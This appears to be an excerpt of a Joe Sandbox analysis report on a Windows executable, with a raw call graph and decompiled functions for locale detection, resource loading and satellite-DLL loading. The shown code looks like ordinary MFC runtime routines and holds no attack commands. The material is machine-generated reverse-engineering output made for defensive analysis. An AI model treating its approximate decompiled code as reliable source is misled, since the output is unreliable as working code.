_fast_error_exit 3 API calls 27086->27088 27087->26504 27088->27087 27089->27079 27091 406c6a 27089->27091 27098 406b65 27091->27098 27093 406c72 27094 406c7f 27093->27094 27102 40e25e LocalFree 27093->27102 27094->27089 27096->27082 27097->27086 27099 406b71 __EH_prolog3 ctype 27098->27099 27103 40e856 EnterCriticalSection LeaveCriticalSection 27099->27103 27101 406bf7 ctype 27101->27093 27102->27094 27103->27101 27104 403345 GetModuleFileNameA 27105 403375 27104->27105 27106 4033c8 27104->27106 27105->27106 27107 403379 PathFindExtensionA 27105->27107 27109 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 27106->27109 27107->27106 27108 4033a9 27107->27108 27114 402baf 69 API calls 2 library calls 27108->27114 27111 4033d7 27109->27111 27112 4033b9 27115 40305e 27112->27115 27114->27112 27146 41e981 27115->27146 27117 403082 GetModuleHandleA GetProcAddress 27118 403179 GetVersion 27117->27118 27119 4030b9 ConvertDefaultLocale ConvertDefaultLocale GetProcAddress 27117->27119 27120 403187 RegOpenKeyExA 27118->27120 27121 403238 GetModuleHandleA 27118->27121 27130 403137 27119->27130 27131 403107 ConvertDefaultLocale ConvertDefaultLocale 27119->27131 27122 4031a8 RegQueryValueExA 27120->27122 27123 403139 GetModuleFileNameA 27120->27123 27121->27123 27125 403247 EnumResourceLanguagesA 27121->27125 27128 40322a RegCloseKey 27122->27128 27129 4031cd 27122->27129 27126 4032a0 _memset 27123->27126 27127 403172 27123->27127 27125->27123 27132 403268 ConvertDefaultLocale ConvertDefaultLocale 27125->27132 27147 4025c0 27126->27147 27133 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 27127->27133 27128->27123 27129->27128 27182 41ed72 69 API calls _vscan_fn 27129->27182 27130->27123 27131->27130 27132->27123 27137 40333b 27133->27137 27137->27106 27138 4031e8 27138->27128 27140 4031f0 ConvertDefaultLocale ConvertDefaultLocale 27138->27140 27140->27128 27142 40330e 27183 402df8 DeactivateActCtx ReleaseActCtx 27142->27183 27145 4032e4 27145->27142 27158 402d2b 27145->27158 27146->27117 27148 402668 27147->27148 27149 4025dd GetModuleHandleA 27147->27149 27154 402670 27148->27154 27150 4025f3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27149->27150 27151 4025ee 27149->27151 27150->27151 27153 402661 27151->27153 27184 40d8b0 RaiseException __CxxThrowException@8 27151->27184 27153->27148 27155 402680 27154->27155 27156 40267c 27154->27156 27155->27156 27157 402690 CreateActCtxA 27155->27157 27156->27145 27157->27156 27159 402d50 27158->27159 27160 402db4 GetLocaleInfoA 27158->27160 27188 41ea8b 69 API calls __filbuf 27159->27188 27162 402d5d ctype 27160->27162 27181 402dc6 27160->27181 27163 41ec4c __filbuf 69 API calls 27162->27163 27164 402d6d 27163->27164 27166 41ec4c __filbuf 69 API calls 27164->27166 27165 41d773 __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 5 API calls 27167 402df6 27165->27167 27168 402d74 27166->27168 27167->27145 27185 41ebf2 27168->27185 27171 41ec4c __filbuf 69 API calls 27172 402da0 27171->27172 27173 402da5 27172->27173 27174 402dc8 27172->27174 27176 41ec4c __filbuf 69 API calls 27173->27176 27175 41ec4c __filbuf 69 API calls 27174->27175 27178 402db1 27175->27178 27177 402daa 27176->27177 27189 402b7a 82 API calls ctype 27177->27189 27180 402dd8 LoadLibraryA 27178->27180 27178->27181 27180->27181 27181->27165 27182->27138 27183->27127 27190 420b46 27185->27190 27188->27162 27189->27178 27191 420b72 27190->27191 27192 420b52 27190->27192 27195 420b80 27191->27195 27196 420ba7 27191->27196 27193 41ec4c __filbuf 69 API calls 27192->27193 27194 420b57 27193->27194 27220 423695 5 API calls 2 library calls 27194->27220 27197 41ec4c __filbuf 69 API calls 27195->27197 27200 402d96 27195->27200 27199 41ec4c __filbuf 69 API calls 27196->27199 27217 420b9c 27197->27217 27201 420bac 27199->27201 27200->27171 27202 420be7 27201->27202 27203 420bba 27201->27203 27222 4209db 103 API calls 2 library calls 27202->27222 27221 4209db 103 API calls 2 library calls 27203->27221 27207 420bf8 27209 420c20 27207->27209 27211 420c0a 27207->27211 27208 420bcc 27208->27209 27210 420bd4 27208->27210 27209->27200 27216 41ec4c __filbuf 69 API calls 27209->27216 27212 41ec4c __filbuf 69 API calls 27210->27212 27213 41ec4c __filbuf 69 API calls 27211->27213 27214 420bd9 27212->27214 27215 420c0f 27213->27215 27214->27200 27218 41ec4c __filbuf 69 API calls 27214->27218 27215->27200 27219 41ec4c __filbuf 69 API calls 27215->27219 27216->27217 27223 423695 5 API calls 2 library calls 27217->27223 27218->27200 27219->27200 27221->27208 27222->27207 27224 40b8a5 27251 41e9b4 27224->27251 27226 40b8b1 GetPropA 27227 40b97b 27226->27227 27228 40b8db 27226->27228 27231 40a17c 113 API calls 27227->27231 27229 40b8e0 27228->27229 27230 40b95a 27228->27230 27233 40b8e5 27229->27233 27234 40b936 SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 27229->27234 27232 40a17c 113 API calls 27230->27232 27235 40b983 27231->27235 27237 40b960 27232->27237 27236 40b999 CallWindowProcA 27233->27236 27238 40b8f0 27233->27238 27234->27236 27239 40a17c 113 API calls 27235->27239 27246 40b92b ctype 27236->27246 27268 40b82f 121 API calls ctype 27237->27268 27241 40a17c 113 API calls 27238->27241 27242 40b98b 27239->27242 27244 40b8f6 27241->27244 27269 40b7b9 120 API calls 27242->27269 27243 40b972 27247 40b995 27243->27247 27252 408ec6 GetWindowRect GetWindowLongA 27244->27252 27247->27236 27247->27246 27249 40b906 CallWindowProcA 27253 40a751 27249->27253 27251->27226 27252->27249 27254 40a760 27253->27254 27255 40a7c8 27253->27255 27256 40ce51 GetWindowLongA 27254->27256 27255->27246 27257 40a76b 27256->27257 27257->27255 27258 40a772 GetWindowRect 27257->27258 27258->27255 27259 40a789 27258->27259 27259->27255 27260 40a791 GetWindow 27259->27260 27261 40a17c 113 API calls 27260->27261 27262 40a7a2 27261->27262 27263 40a7ad 27262->27263 27309 40cf40 IsWindowEnabled 27262->27309 27263->27255 27270 404c4f 27263->27270 27268->27243 27269->27247 27271 404c86 27270->27271 27272 404c67 27270->27272 27274 404c8c LockResource 27271->27274 27278 404c97 27271->27278 27273 40706d ctype 112 API calls 27272->27273 27275 404c6c FindResourceA LoadResource 27273->27275 27274->27278 27275->27271 27276 404cd6 FreeResource 27277 404cdf 27276->27277 27277->27255 27279 409b50 27277->27279 27278->27276 27278->27277 27280 40ce51 GetWindowLongA 27279->27280 27281 409b62 27280->27281 27282 409b6c 27281->27282 27284 409b85 GetWindow 27281->27284 27285 409b7a GetParent 27281->27285 27283 409bac GetWindowRect 27282->27283 27287 409c54 GetParent GetClientRect GetClientRect MapWindowPoints 27283->27287 27288 409bc9 27283->27288 27286 409b90 27284->27286 27285->27286 27286->27283 27289 409b96 SendMessageA 27286->27289 27298 409c81 27287->27298 27290 409bdd 27288->27290 27291 409bcd GetWindowLongA 27288->27291 27289->27283 27292 409baa 27289->27292 27293 409bf1 27290->27293 27294 409c2b GetWindowRect 27290->27294 27291->27290 27292->27283 27310 402551 112 API calls 27293->27310 27313 407da9 21 API calls 27294->27313 27297 409bf6 27311 407da9 21 API calls 27297->27311 27303 40d105 SetWindowPos 27298->27303 27299 409c3e 27314 407e14 82 API calls __NMSG_WRITE 27299->27314 27306 409d0c 27303->27306 27304 409c44 CopyRect 27304->27298 27305 409c09 27312 407e14 82 API calls __NMSG_WRITE 27305->27312 27306->27255 27308 409c0f CopyRect CopyRect 27308->27298 27309->27263 27310->27297 27311->27305 27312->27308 27313->27299 27314->27304 27315 40b9e9 27316 40b9f8 __EH_prolog3_GS 27315->27316 27317 40e7cc ctype 106 API calls 27316->27317 27318 40ba13 27317->27318 27319 40ba29 27318->27319 27355 40d8b0 RaiseException __CxxThrowException@8 27318->27355 27321 40ba42 27319->27321 27322 40ba2f CallNextHookEx 27319->27322 27324 40706d ctype 112 API calls 27321->27324 27323 40bc32 27322->27323 27361 41ea6d 5 API calls __ehhandler$?_Initialize@SchedulerPolicy@Concurrency@@AAEXIPAPAD@Z 27323->27361 27326 40ba4c 27324->27326 27328 40bc02 CallNextHookEx 27326->27328 27329 40ba78 GetClassLongA 27326->27329 27342 40bab9 27326->27342 27328->27323 27331 40bc25 UnhookWindowsHookEx 27328->27331 27329->27328 27330 40ba8c 27329->27330 27333 40ba96 GlobalGetAtomNameA 27330->27333 27334 40baae 27330->27334 27331->27323 27332 40bac7 27357 4070b9 112 API calls ctype 27332->27357 27333->27334 27356 402c6f CompareStringA 27334->27356 27335 40bb71 GetClassLongA 27340 40bbb6 GetWindowLongA 27335->27340 27353 40bb04 ctype 27335->27353 27336 40bb2d _memset 27336->27335 27359 408c43 115 API calls 2 library calls 27336->27359 27339 40bad2 27358 40a1bd 113 API calls ctype 27339->27358 27340->27328 27341 40bbc6 GetPropA 27340->27341 27341->27328 27344 40bbd9 SetPropA GetPropA 27341->27344 27342->27328 27342->27332 27342->27336 27344->27328 27347 40bbed GlobalAddAtomA SetWindowLongA 27344->27347 27346 40bade SetWindowLongA 27346->27353 27347->27328 27348 40bb63 27348->27335 27349 40bb88 GetClassNameA 27348->27349 27349->27340 27350 40bb9f 27349->27350 27360 41efd9 79 API calls __mbscmp_l 27350->27360 27353->27328 27354 40bbb0 27354->27328 27354->27340 27356->27342 27357->27339 27358->27346 27359->27348 27360->27354 27362 409eda 27363 409ee3 GetModuleHandleA 27362->27363 27364 409f07 27362->27364 27363->27364 27365 409ef3 LoadLibraryA 27363->27365 27365->27364 27366 40a8ba 27367 40a8cb 27366->27367 27373 40a8c6 27366->27373 27374 40a1a3 27367->27374 27370 40a8f0 DefWindowProcA 27370->27373 27371 40a8de 27377 40a7cd 27371->27377 27375 40a108 ctype 112 API calls 27374->27375 27376 40a1aa 27375->27376 27376->27370 27376->27371 27378 40a7d9 __EH_prolog3_catch 27377->27378 27379 40e7cc ctype 106 API calls 27378->27379 27380 40a7e8 27379->27380 27381 40a7ff 27380->27381 27394 40d8b0 RaiseException __CxxThrowException@8 27380->27394 27383 40a856 27381->27383 27395 408ec6 GetWindowRect GetWindowLongA 27381->27395 27389 4086cd 27383->27389 27386 40a751 155 API calls 27387 40a87f ctype 27386->27387 27387->27373 27396 40a0d8 27389->27396 27391 408706 27391->27386 27391->27387 27395->27383 27397 40e7cc ctype 106 API calls 27396->27397 27398 40a0ea 27397->27398 27400 4085b4 2 API calls 27398->27400 27399 4086ef 27399->27391 27401 4085b4 27399->27401 27400->27399 27402 4085c1 27401->27402 27403 4085e3 CallWindowProcA 27401->27403 27402->27403 27405 4085cf DefWindowProcA 27402->27405 27404 4085f6 27403->27404 27404->27391 27405->27404 27406 4027bc 27407 4027ca 27406->27407 27410 4026f9 27407->27410 27412 4027b4 27410->27412 27415 40272d 27410->27415 27411 40272e RegOpenKeyExA 27411->27415 27413 40274b RegQueryValueExA 27413->27415 27414 40279d RegCloseKey 27414->27415 27415->27411 27415->27412 27415->27413 27415->27414 27416 40e8de 27417 40e8fd 27416->27417 27418 40e8ee 27416->27418 27418->27417 27420 40e886 27418->27420 27421 40e891 27420->27421 27422 40e8a4 27420->27422 27421->27422 27428 40e6de EnterCriticalSection LeaveCriticalSection LocalFree TlsSetValue RaiseException 27421->27428 27424 40e8b2 27422->27424 27425 40e8ab TlsFree 27422->27425 27426 40e8d0 DeleteCriticalSection 27424->27426 27427 40e8b9 GlobalHandle GlobalUnlock GlobalFree 27424->27427 27425->27424 27426->27417 27427->27426 27428->27421 27429 41807e 8 API calls

                                                                                                                            Executed Functions

                                                                                                                            Function 00402D2B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 496 402d2b-402d4e 497 402d50-402d63 call 41ea8b call 401330 496->497 498 402db4-402dc4 GetLocaleInfoA 496->498 500 402d66-402da3 call 41ec4c * 2 call 41ebf2 call 41ec4c 497->500 498->500 501 402dc6 498->501 516 402da5-402db2 call 41ec4c call 402b7a 500->516 517 402dc8-402dcd call 41ec4c 500->517 503 402deb-402df7 call 41d773 501->503 523 402dcf-402dd2 516->523 517->523 525 402dd4-402dd6 523->525 526 402de7 523->526 525->526 527 402dd8-402de5 LoadLibraryA 525->527 528 402de9-402dea 526->528 527->528 528->503
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E00402D2B(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t32 = __edx;
				_t9 =  *0x441590; // 0x4917eadc
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					_t12 = GetLocaleInfoA(_a4, 3,  &_v288, 4); // executed
					__eflags = _t12;
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					E00401330(E0041EA8B(__edx,  &_v288, 4, "LOC"));
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E0041EC4C(_t39));
					 *(E0041EC4C(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E0041EBF2( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E0041EC4C(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E0041EC4C(__eflags)) = _t34;
					} else {
						E00402B7A( *((intOrPtr*)(E0041EC4C(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284); // executed
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E0041D773(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}




















                                                                                                                            0x00402d2b
                                                                                                                            0x00402d34
                                                                                                                            0x00402d3b
                                                                                                                            0x00402d3e
                                                                                                                            0x00402d46
                                                                                                                            0x00402d4e
                                                                                                                            0x00402dbc
                                                                                                                            0x00402dc2
                                                                                                                            0x00402dc4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00402dc6
                                                                                                                            0x00402d50
                                                                                                                            0x00402d5e
                                                                                                                            0x00402d63
                                                                                                                            0x00402d66
                                                                                                                            0x00402d66
                                                                                                                            0x00402d67
                                                                                                                            0x00402d6d
                                                                                                                            0x00402d74
                                                                                                                            0x00402d84
                                                                                                                            0x00402d99
                                                                                                                            0x00402d9b
                                                                                                                            0x00402da0
                                                                                                                            0x00402da3
                                                                                                                            0x00402dcd
                                                                                                                            0x00402da5
                                                                                                                            0x00402dac
                                                                                                                            0x00402db1
                                                                                                                            0x00402dd2
                                                                                                                            0x00402de7
                                                                                                                            0x00402de7
                                                                                                                            0x00402dd8
                                                                                                                            0x00402ddf
                                                                                                                            0x00402ddf
                                                                                                                            0x00402de9
                                                                                                                            0x00402dea
                                                                                                                            0x00402dea
                                                                                                                            0x00402df7

                                                                                                                            APIs
                                                                                                                            • _strcpy_s.LIBCMT ref: 00402D58
                                                                                                                              • Part of subcall function 0041EC4C: __getptd_noexit.LIBCMT ref: 0041EC4C
                                                                                                                            • __snprintf_s.LIBCMT ref: 00402D91
                                                                                                                              • Part of subcall function 0041EBF2: __vsnprintf_s_l.LIBCMT ref: 0041EC07
                                                                                                                            • GetLocaleInfoA.KERNELBASE(00000800,00000003,?,00000004), ref: 00402DBC
                                                                                                                            • LoadLibraryA.KERNELBASE(?), ref: 00402DDF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                            • String ID: LOC
                                                                                                                            • API String ID: 3864805678-519433814
                                                                                                                            • Opcode ID: a47c032e2b0efb8dc6454d89640db06c652e6232af7e71c943e27625eebca1e2
                                                                                                                            • Instruction ID: 1465f7124f691099ae13738c63e548620ab7745df68099be7acecbc8996b2824
                                                                                                                            • Opcode Fuzzy Hash: a47c032e2b0efb8dc6454d89640db06c652e6232af7e71c943e27625eebca1e2
                                                                                                                            • Instruction Fuzzy Hash: 6311DD70500108AAEB19BB62CD4AFDA77AC9F05319F1000B7F505A71E1DABC9E8586AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404C4F Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 538 404c4f-404c65 539 404c86-404c8a 538->539 540 404c67-404c83 call 40706d FindResourceA LoadResource 538->540 542 404c97-404c9c 539->542 543 404c8c-404c95 LockResource 539->543 540->539 545 404cd0-404cd4 542->545 546 404c9e-404ca6 542->546 543->542 547 404cd6-404cd9 FreeResource 545->547 548 404cdf-404ce5 545->548 549 404cb5-404cb9 546->549 550 404ca8-404cb3 546->550 547->548 551 404cbd-404cc2 549->551 550->551 552 404cc4-404cc7 551->552 553 404cce 551->553 552->553 554 404cc9-404ccc 552->554 553->545 554->545 554->553
                                                                                                                            C-Code - Quality: 90%
                                                                                                                            			E00404C4F(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				struct HRSRC__* _t26;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E0040706D(_t28, __ecx, _t40, _t42) + 0xc);
					_t26 = FindResourceA(_t32,  *(_t37 + 0x58), 5); // executed
					_v8 = LoadResource(_t32, _t26);
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

















                                                                                                                            0x00404c52
                                                                                                                            0x00404c53
                                                                                                                            0x00404c56
                                                                                                                            0x00404c58
                                                                                                                            0x00404c5f
                                                                                                                            0x00404c62
                                                                                                                            0x00404c65
                                                                                                                            0x00404c6c
                                                                                                                            0x00404c75
                                                                                                                            0x00404c83
                                                                                                                            0x00404c83
                                                                                                                            0x00404c8a
                                                                                                                            0x00404c95
                                                                                                                            0x00404c95
                                                                                                                            0x00404c99
                                                                                                                            0x00404c9c
                                                                                                                            0x00404ca4
                                                                                                                            0x00404ca6
                                                                                                                            0x00404cb5
                                                                                                                            0x00404cb9
                                                                                                                            0x00404ca8
                                                                                                                            0x00404ca8
                                                                                                                            0x00404cab
                                                                                                                            0x00404caf
                                                                                                                            0x00404caf
                                                                                                                            0x00404cc2
                                                                                                                            0x00404cce
                                                                                                                            0x00404cce
                                                                                                                            0x00404cc2
                                                                                                                            0x00404cd4
                                                                                                                            0x00404cd9
                                                                                                                            0x00404cd9
                                                                                                                            0x00404ce5

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 00404C75
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00404C7D
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00404C8F
                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 00404CD9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078018258-0
                                                                                                                            • Opcode ID: 129c5a1f524af14e4e626f530cd4aa25fc75add2b9915816dba2877b2c569767
                                                                                                                            • Instruction ID: e763e0d4210b1aa6502af0843da20efbd468329764cbdfdc562dd080451cf168
                                                                                                                            • Opcode Fuzzy Hash: 129c5a1f524af14e4e626f530cd4aa25fc75add2b9915816dba2877b2c569767
                                                                                                                            • Instruction Fuzzy Hash: 6E11E770505710EFE7209FA5C8486A7B3B4FF40716F11417AE94263790E378ED50D794
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040305E Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229registrylibraryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 84%
                                                                                                                            			E0040305E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				int _t129;
				int _t130;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x441590; // 0x4917eadc
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E0041E981(E00431098, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E004025AA, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *(_t181 - 0x34) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *(_t181 - 0x30) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E0041ED72( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *(_t181 - 0x34) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *(_t181 - 0x30) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					_t129 = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164); // executed
					 *(_t181 - 0x34) = _t129;
					_t130 = ConvertDefaultLocale( *(_t181 - 0x1c)); // executed
					 *(_t181 - 0x30) = _t130;
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E0041EC90(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x400000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E004025C0(_t181 - 0x3c, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E00402670(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E004026A6(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E00402DF8(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E00402D2B( *(_t181 - 0x40), _t167, _t181[_t176 * 4 - 0x34]); // executed
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E0041D773(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}


































                                                                                                                            0x0040305e
                                                                                                                            0x0040305f
                                                                                                                            0x00403065
                                                                                                                            0x00403069
                                                                                                                            0x00403070
                                                                                                                            0x00403076
                                                                                                                            0x0040307d
                                                                                                                            0x0040308e
                                                                                                                            0x00403095
                                                                                                                            0x00403098
                                                                                                                            0x0040309b
                                                                                                                            0x0040309e
                                                                                                                            0x004030ac
                                                                                                                            0x004030af
                                                                                                                            0x004030b3
                                                                                                                            0x00403181
                                                                                                                            0x0040323d
                                                                                                                            0x00403241
                                                                                                                            0x00403255
                                                                                                                            0x00403258
                                                                                                                            0x00403262
                                                                                                                            0x00403268
                                                                                                                            0x00403280
                                                                                                                            0x0040328c
                                                                                                                            0x00403291
                                                                                                                            0x00403294
                                                                                                                            0x00403294
                                                                                                                            0x00403262
                                                                                                                            0x00403187
                                                                                                                            0x0040319b
                                                                                                                            0x004031a6
                                                                                                                            0x004031bc
                                                                                                                            0x004031cb
                                                                                                                            0x004031e3
                                                                                                                            0x004031e8
                                                                                                                            0x004031ee
                                                                                                                            0x004031fa
